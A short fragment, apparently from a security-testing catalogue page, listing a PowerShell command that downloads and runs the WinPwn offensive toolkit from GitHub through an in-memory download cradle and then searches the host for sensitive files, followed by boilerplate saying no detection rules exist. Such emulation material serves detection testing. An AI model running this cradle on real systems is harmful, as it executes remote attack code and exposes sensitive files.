powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.